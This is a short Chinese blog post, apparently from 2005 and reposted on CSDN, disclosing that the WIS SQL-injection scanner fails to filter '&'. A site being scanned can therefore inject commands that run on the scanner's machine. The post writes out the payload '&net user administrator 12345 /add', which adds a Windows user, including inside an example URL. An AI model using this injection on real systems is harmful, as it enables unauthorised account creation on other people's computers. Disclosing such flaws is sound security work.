小榕的WIS漏洞(ALLyeSNO) 【补充一下】

最新推荐文章于 2018-06-23 22:46:57 发布
最新推荐文章于 2018-06-23 22:46:57 发布
阅读量2.6k 收藏
点赞数
分类专栏: 权限提升 原创文章 文章标签: user date asp 工具 sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/freexploit/article/details/277899
版权

Term     : FreeXploiT

Author : ALLyeSNO

Date      : 2005-2-2

WIS是小榕开发的SQL漏洞扫描工具
WIS对&字符未做严格过滤 导致可以 人为的创建含&字符的语句 在扫描者机子上执行任意代码

&net user allyesno 12345 /add

不是wis&net user allyesno 12345 /add
而是 使用 wis对 某一个网站进行扫描的时候

我们可以利用wis未过滤& 在被扫描的网站代码 例如asp代码中嵌入&net user administrator 12345 /add

当wis对它进行扫描的时候 结果如下

http://www.target.com/sqlbug?=sql&net user administrator 12345 /add

本地执行wis &net user allyesno 12345 /add  是肯定可以的 因为&是把两段指令连在一起执行

freexploit
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
小榕软件 流光 Fluxay v5.0 IP漏洞扫描邮箱密码破解 多国语言绿色免费版
05-23
流光 Fluxay v5.0 IP漏洞扫描邮箱密码破解 多国语言绿色免费版
扫描工具--小榕工作室
注重长远 天天积累 cqujsjcyj
05-25 742
可扫描服务器漏洞   http://www.netxeyes.com/
小榕SQL注入工具wed+wis全套下载
07-22
大名鼎鼎的小榕SQL注入工具包,有兴趣的朋友可以下载对网站的sql漏洞进行扫描测试,完善自己的网站漏洞
小榕sql注入分析工具wed+wis
06-06
好用的sql注入分析工具
FreeXploiT-个人程序/文章发布时间
FreeXploiT
01-06 1927
工具以及文章将分为内部和公开两种 内部发布的 将永远不对外发布1.backdoor : 菜菜 发布日期:? 正式发布:否 DEMO发布:否功能简介:连接反弹和主动两种 一个简单的cmdshell 可对进程操作 后门无进程发布性质:无限期计划搁置发布性质:?2.隐形的克隆帐号 : ALLyeSNO 发布日期:? 正式发布:否 DEMO发布:是功能简介:无限期计划搁置发布性质:FreeXploiT内部
小榕写的sql注入工具wed+wis.rar
10-11
在这个场景中,"小榕写的sql注入工具wed+wis.rar" 提供了一种可能的方式来检测和测试系统是否存在SQL注入漏洞。 首先,我们需要了解SQL注入的基本原理。当用户在Web表单中输入数据,这些数据通常会被拼接到一个SQL...
小榕sql注入工具
02-01
Wis(Web Information System)和Wed(Web Exploit Detector)是小榕工具中的两个关键模块,分别用于信息收集和漏洞检测。Wis模块可以收集目标网站的服务器信息、数据库类型、版本等,为后续的渗透测试提供基础数据...
小榕SQL注入-wis,wed工具
01-06
"小榕SQL注入-wiswed工具包"是专门用于检测和分析SQL注入漏洞的专业工具,旨在帮助安全研究人员和Web开发者识别并修复此类问题,而不是用于非法攻击。 wiswed是这个工具包中的两个主要组件: 1. wis(Web SQL ...
超好用的SQL注入工具(wed.exe,wis.exe)及用其入侵的实例!!!
热门推荐
王百万的Blog
04-14 3万+
小榕的流光的时候,启动时介绍了两个工具:一个是wed.exe,另一个是wis.exe。这两个工具都是用来测试和进行SQL注入的,其中wed.exe是探测管理员的用户名和密码,而wis.exe用来探测后台的登录页面!注意:使用这两个工具的时候,一定要关闭防火墙,因为大部分的杀毒软件都会认为它们是病毒!!!!!wed.exe会首先探测是否能进行SQL注入,如果不会,会立即返回!行的话,进行了
FreeXploiT 成立三年感言!
FreeXploiT
01-11 8243
 04年成立的,和一个朋友,现在那个朋友不知所踪了(他叫菜菜,很早就玩汇编了)后来的两年基本是我一个人更新里面的blog我这个算是最早的安全聚合blog吧? 暗礁的也挺早 不过是团队形式的 鬼仔的05年 neeao的04.10.26我的04.10.15那时候就是想弄点资料自己收藏着看看 ,当然也有很长远的目标 就是想做一个网站 先拿blog练练手一练就是三年啊 哈。。blo
DOS那一代的程序员现在都干嘛呢?
FreeXploiT
06-27 1万+
亿友论坛-DOS那一代的程序员现在都干嘛呢?(几年前的老帖子)          --  作者:包子夹蛋      --  发布时间:2005-5-10 14:01:00      --  DOS那一代的程序员现在都干嘛呢?(几年前的老帖子)      几年前的老帖子了,个人认为还不错,拿出来与大家分享      nnmm注:一群DOS年代老鸟的感言      [主题]DOS那一代的程序员现在都干
中国的顶级黑客-小榕
要饭's Blog
05-18 8368
收藏本文并不是因为崇拜,而是因为理解.网名:小榕性别:男年纪:31 婚姻:已婚资力:中国CAD/CAM协会会员,高级程序员格言:无论在现实或是网络中,我都是孤独的.......黑客原则:不能仇视社会,不能给别人制造麻烦,不能给别人带来损失。有人对黑客这样评价:黑客是一种不断研究不断探索的境界。个人站点:netxeyes.org====================================
黑客快速入门
相信自我
05-20 4203
我认为这是一套适合初学者由浅到深的文章,所以强烈推荐给大家,作者从基础讲到最近比较火的漏洞,可能有些人看来是浅了些,但是的确很适合想干点啥但又不知道怎么办的菜鸟们 。第一节,伸展运动。这节操我们要准备道具,俗话说:“工欲善其事,必先利其器”(是这样吗?哎!文化低……)说得有道理,我们要学习黑客技术,一点必要的工具必不可少。 1,一台属于自己的可以上网的电脑。这样你可以有充分的支配权,上网不用说,否
Tracert In The Bat (ALLyeSNO)
FreeXploiT
10-15 1335
用法:程序默认检查5个跃点,以及使用当前目录的ip.txt文件为ip数据库你也可以指定跃点数以及ip数据库文件名tip tip 跃点数 ip数据库(tip 30 iplog.txt) rem Build and Test by ALLyeSNO in WIN2K&WINXP @echo off clsecho Build and Test by ALLyeSNO in WIN2K^&WINXP e
小榕SQL注入工具使用
:)每天进步一点点
08-13 5688
你先打开菜单里“运行”,输入CMD打开DOS,然后再输入“cd 桌面”,然后回车,再输入“cd wis”,再回车,然后输入“WIS 网址”。这样就OK了注意:前提是你把小榕WIS文件夹放在桌面上。   转载:http://zhidao.baidu.com/question/211726678.html
教你使用visio 2013绘制产品流程图
u011159607的博客
06-23 6478
http://baijiahao.baidu.com/s?id=1582938032162779622&wfr=spider&for=pc1. 打开wisio2013后,将左侧形状区域切换到基本流程图形状,如下图:如果找不到基本流程图,可以在上方的搜索按钮中进行搜索,也可以点击更多形状进行查找。2. 选中左侧的流程形状,将其拖拽到纸张画布区域。如下图:3. 双击画布中的流程形状,进...
当我们完全控制CISCO路由器时能够做的事情
FreeXploiT
10-27 2329
|------------------------------- 翻译 by mix --------------------------------||----------------和以前一样,我要申明一下,我不是专业的翻译员-----------------||---------所以我也只能够根据我自己的理解,尽量符合原文意思的进行翻译----------||------------有能力的
windows网关详解 【了解网关的重要性,增加网络性能】【FreeXploiT综合文】
FreeXploiT
06-22 1万+
理解Windows中的路由表和默认网关   每一个Windows系统中都具有IP路由表,它存储了本地计算机可以到达的网络目的地址范围和如何到达的路由信息。路由表是TCP/IP通信的基础,本地计算机上的任何TCP/IP通信都受到路由表的控制。 理解路由表 你可以运行 route print 或 netstat -r 显示本地计算机上的路由表,如下图所示: C:/Documents
史上最绝黑客入侵(黑客是这样练成的!!!)(ALLyeSNO)
FreeXploiT
11-14 2674
作者: allyesno [allyesno]    论坛用户回复   收藏   修改   删除 quest认为到目前为止,问题已有明确答案,本贴已被冻结,不再接受更多的回复 我们今晚的目标是 192.168.0.1  它是我们小区的FTP下载论坛里面有不少XXXX片。。所以我们。。咳咳  不是 是我们想检验一下我们这一年到底学了什么真的本事最终的目的是拿到论
ModuleNotFoundError: No module named 'wis_downloader'
最新发布
04-11
ModuleNotFoundError: No module named 'wis_downloader' 是Python中的错误提示,意味着你的代码中引用了一个名为'wis_downloader'的模块,但是Python解释器找不到该模块。 这个错误通常有以下几种可能的原因: 1. ...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值